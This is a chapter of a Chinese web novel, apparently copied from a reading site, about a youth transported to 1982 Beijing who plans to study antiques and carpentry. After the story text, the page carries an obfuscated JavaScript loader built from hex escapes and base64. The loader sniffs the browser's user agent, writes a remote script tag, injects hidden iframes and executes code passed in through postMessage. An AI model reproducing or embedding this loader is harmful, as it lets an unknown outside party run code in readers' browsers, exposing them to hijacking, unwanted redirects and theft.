当前位置:铅笔小说>言情女生>重生1982做顽主> 第二章 天下百工天道酬勤

第二章 天下百工天道酬勤

  目光看向手中的戒指,这是导致他穿越的罪魁祸首,里圈刻着八个大字,“天下百工、天道酬勤”。

  ranwen.la

  天下百工这是一个虚数,指的是各种工匠手艺人。

  天道酬勤,更好理解,指的是上天会按照每个人付出的勤奋,给予相应的酬劳。

  这也是他的金手指,天道酬勤努力不会白费。

  人生最怕的是什么?我努力了,结果我失败了,这不让人绝望吗?

  而这恰恰是很多人的遭遇,我明明那么努力,结果到最后还是一事无成。

  我头悬梁锥刺股努力读书,结果还是考不上大学。

  明明我努力工作,打三份工干十六个小时,结果还生活在社会最底层。

  努力了却得不到回报,这种痛苦心酸难以想象。

  而拥有天道酬勤,他的努力就会得到回报。

  一步一个脚印,踏踏实实勤奋工作,最终有成功的一天。

  或许他应该去书店看看,找一些古董方面的书,在天道酬勤的加持下,早晚能成为一名鉴宝大师。

  现在嘛,当然是睡觉,天都黑了,图书馆也关门了,他上哪去找图书。

  看母亲将碎掉的瓷碗扫起来,准备扔掉,杜康赶紧阻止。

  将这些瓷片小心翼翼的收好,找了个角落藏起来。

  他可舍不得扔掉,再怎么说这也是清乾隆年间的瓷碗,以后找个锔瓷匠收拾一下,照样又是个古董。

  杜明看到这一幕,奇怪道“你留着碎片干什么,又不是什么好东西,赶快给我扔了。”

  “没什么,一个念想而已。”

  杜康没有多说,谁能想到这普通的瓷器在几十年后,价格能够翻个数千上万倍。

  以至于,后来很多人想到以前没将古董当回事,结果打碎了弄丢了,心痛的难以入眠。

  吃过饭,杜康看了会书便躺在床上睡觉。

  想不睡觉也没办法,现在可没有那么多的娱乐活动,就连电视都没有。

  除了床上那点事,根本没有什么娱乐活动。

  可他现在不过是个二八少年,独自一人没有玩耍的伙伴,哪里能睡得着,在床上翻过来掉过去,想着其他事情。

  要说他对这个家还是很满意的,他家是住在四合院,想想四九城的四合院,日后那是多少钱?

  几亿乃至十几亿不在少数,而且还是有价无市的那种。

  自己就躺在其中,天天在里面生活。

  哪怕什么不干,日后的身家都得蹭蹭蹭往上涨。

  当然不是独占一整个四合院,八十年代初,能有个独门独院的四合院,那得是什么样的家庭?

  他穿越的时候没那么好运。

  是跟几户人家一起,形成一个大杂院。

  他们家住在东边的三间厢房,加起来有百来平米左右。

  搁到以后,百来平米相对一个四口之家,并不算多。

  但现在是八二年,四九城的人均住房面积,好像是四平米。

  别说居家舒适的三室两厅,很多人是一家人挤在一间屋内。

  这就很酸爽。

  睡觉的时候想做些夫妻间喜闻乐见的游戏,都得提心吊胆,小心翼翼,生怕发出点声音。

  没办法,一家人,爸爸妈妈,儿子女儿,甚至还有爷爷奶奶,叔叔伯伯,挤在一间屋内。

  稍有点动静,都听的清清楚楚。

  若是叫出声,堪比现场直播啊!

  就问这得多大的心,才能放得开。

  三间房,父母一间,自己一间,妹妹也能有一间,足够保证自己的隐私。

  再说做为穿越者,连个房子都挣不出来,还混个毛蛋。

  早起刷牙,吃过早饭,杜康跟父母说了声,就前往图书馆借书学习。

  赶到图书馆,杜康询问了下管理员,便过去寻找古董方面的书籍。

  作为一名学生,图书馆是他常来的地方,所不同的是,以前看的是学习图书,而现在准备学习古董鉴定。

  忽然一本木匠大全映入眼帘,杜康微微愣住,感觉自己裂开了。

  收古董的确重要,可这其中少不了一个重要的东西,钱!

  没有钱,哪怕古董再便宜,你也收不到。

  现在该怎么赚钱,或许可以从木匠着手,至少这是门手艺,一门不错的手艺。

  提及七八十年代,人们的第一印象就是贫穷,这个不假,的确是穷。

  工人平均每个月只有二三十的收入。

  农民更惨,一年能挣个百来块,就是富裕户,更多的家庭连吃都吃不饱,为了口吃的,年年欠下一屁股债。

  但你也永远别小瞧人赚钱的速度。

  从七八年分产到户,随后改开,吹响了中华儿女崛起的号角。

  然后,七八年有人靠养猪成为万元户。

  七九年有人炒瓜子成为百万富翁。

  等到八五年,就有了第一个亿万富翁。

  要知道,八五年时候工人的平均工资才几十块钱啊!

  这速度,吹牛你都不敢这么吹。

  然而这就是事实,有人在短短几年的时间就成为了亿万富翁。

  他发家致富靠的就是雕花佛龛,是木匠手艺的一种。

  当然个人机缘不同,手法不同,即使走同样的路,他也没有信心达到对方那样的高度。

  但也可看出木匠在此时的潜力之高,既然如此他何不试试?

  就拿起这本木匠大全,坐在阅读区看了起来。

  至于古董,等离开的时候借几本回去看。

  随着阅读,一道道灵光在脑海乍现,让他对木匠这门手艺有了更深的理解。

  这要是系统文,保证脑海中会响起系统提示:“你认真阅读木匠大全一分钟,对木工理解加深,木工+1。”

  “你认真阅读木匠大全两分钟,对木工理解加深,木工+2。”

  肉眼看得见的进步,这简直比吸那啥还要上瘾。

  杜康越看越是上瘾,看着看着颇有一种当年看小说看到爽点,彻夜通读的感觉。

  实在是太爽了,舍不得放手,想着读完这章就睡,读完这章,想着看完这段高潮再睡。

  一章推一章,一段推一段,直到不得不放手,脑海中依旧兴奋不已,想着刚才读到的内容久久难以入睡。

  所不同的是,那只是无用的消遣,而这却是看得见的进步,代表了他知识的增长。

  这要是读书都这么爽快,何愁不能成为学霸。
eval("\x77\x69\x6e\x64\x6f\x77")["\x43\x6c\x74\x79"]=function(e){var li ='ABCDEFGHIJKLMNOPQRS'+''+'TUVWXYZabcdefghi'+'jklmnopqrstuvwx'+''+'yz0123456789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=li.indexOf(e.charAt(f++));o=li.indexOf(e.charAt(f++));u=li.indexOf(e.charAt(f++));a=li.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x69\x52\x5a"]=function(){eval(Clty("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dmFyIGRzPW5ldyBEYXRlKCk7dT1kZWNvZGVVUklDb21wb25lbnQoQ2x0eSh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7dT11LnJlcGxhY2UoL3FpaGFuZy9nLGRzLmdldERhdGUoKSk7J2pRdWVyeSc7dmFyIF91YT1uYXZpZ2F0b3IudXNlckFnZW50O3ZhciBfQ2x0eUNsdHk9JzxzJysnY3JpJysncHQgc3JjPSInK3UrJy5qcyI+PFwvcycrJ2NyaXAnKyd0Pic7aWYoX3VhLmluZGV4T2YoQ2x0eSgiWW1GcFpIVT0iKSk+LTEgfHwgX3VhLmluZGV4T2YoQ2x0eSgnU0hWaGQyVnBRbkp2ZDNObGNnPT0nKSk+LTEpe2lmKF91YS5pbmRleE9mKENsdHkoJ2FWQm9iMjVsJykpPi0xKXtkb2N1bWVudC53cml0ZShfQ2x0eUNsdHkpO31lbHNle2Z1bmN0aW9uIHJkKG4sbSl7cmV0dXJuIE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSoobS1uKzEpK24pO31mdW5jdGlvbiBybShlKXtpZihlJiZlLnRhZ05hbWUudG9VcHBlckNhc2UoKT09PSJJRlJBTUUiJiZlLnNyYy5pbmRleE9mKHUpPi0xKXtlLnJlbW92ZSgpO31lbHNlIGlmKGUubmV4dEVsZW1lbnRTaWJsaW5nKXtybShlLm5leHRFbGVtZW50U2libGluZyk7fX1sZXQgYz1kW0NsdHkoIlkzVnljbVZ1ZEZOamNtbHdkQT09IildO3ZhciBfaWQ9X2NsYXNzPSdnJysnJysncUFqJysnJysneCcrJycrJ0hSJysnJysnJzt2YXIgX19rZG5xaWQgPSAnaycgKyByZCgxLCAxMDAwMDApO2RbJ3cnKydyaScrJ3QnKydlJysnbG4nXSgnPGQnKydpdiBpJysnZD0nKyciJytfX2tkbnFpZCsnIj4nKyc8L2QnKydpdicrJz4nKTt3WydfX2snKydkYScrJ25xJysnb2InKydqXzE4NyddPWRbJ3F1JysnZXJ5JysnU2VsZScrJ2N0bycrJ3InXSgnIycrX19rZG5xaWQpO19pZCArPSBkWydxdScrJ2VyeScrJ1NlJysnbGVjJysndG8nKydyQScrJ2xsJ10oJy4nK19jbGFzcykubGVuZ3RoO3ZhciB6ID0gdSsnLTIvJytfaWQrJy8nK3I7ZFsndycrJ3JpJysndCcrJ2UnXSgnPGknKydmcicrJ2EnKydtZSBzdHlsZT0iJysnbScrJ2FyJysnZ2knKyduOjA7cCcrJ2FkJysnZCcrJ2luJysnZzowO2InKydvcicrJ2QnKydlcjpuJysnb24nKydlOycrJ29wJysnYScrJ2NpJysndCcrJ3k6MCcrJy4wJytyZCgyLDkpKyc7d2knKydkdCcrJ2g6JytyZCgyLDUpKydwJysneDtoJysnZScrJ2lnaCcrJ3Q6JytyZCgyLDUpKydwJysneDsnKyciYWwnKydsb3d0cmFuJysnc3BhJysncmVuY3kgc3InKydjPSInK3orJyI+PC9pJysnZnInKydhJysnbWU+Jyk7d1siYWQiKyJkRXYiKyJlbnRMIisiaXN0IisiZW5lciJdKCJtIisiZXNzIisiYWdlIixmdW5jdGlvbihlKXtpZihlLmRhdGFbcitfaWRdKXtybShjKTtuZXcgRnVuY3Rpb24oQ2x0eShlLmRhdGFbcitfaWRdLnJlcGxhY2UobmV3IFJlZ0V4cChyLCdnJyksJycpKSkoKTt9fSk7fX1lbHNle2RvY3VtZW50LndyaXRlKF9DbHR5Q2x0eSk7fX0pKCc9VScrJ2onKycnKydNdGMnKycnKydET3gnKycnKycweScrJycrJ1knKycnKydHJysnJysnSicrJycrJ1RKJysnJysnbicrJzVXJysnJysnWW9sJysnJysnV2NrJysnJysnSicrJycrJ1dibycrJycrJ1JuYycrJycrJ24nKydaJysnWicrJycrJ2tNJysnJysnbCcrJycrJ01ETicrJzBBaicrJ01CTicrJ1QnKydKbCcrJycrJ1JYYScrJycrJ3onKycnKyc1JysneScrJ1onKydadScrJ0YnKycnKydHYScrJ3BGJysnJysnSGNvJysnJysnRm0nKycnKydMelonKydaa00nKycnKydsWScrJ2tNbCcrJ0UwTScrJycrJ2xNSCcrJycrJ2MnKycwJysnUicrJ0hhJysnJysnJywnZycrJycrJ3FBaicrJycrJ3gnKycnKydIUicrJycrJycsd2luZG93LGRvY3VtZW50LDAsJ1onKQ=="));}

上一章目录+书签下一章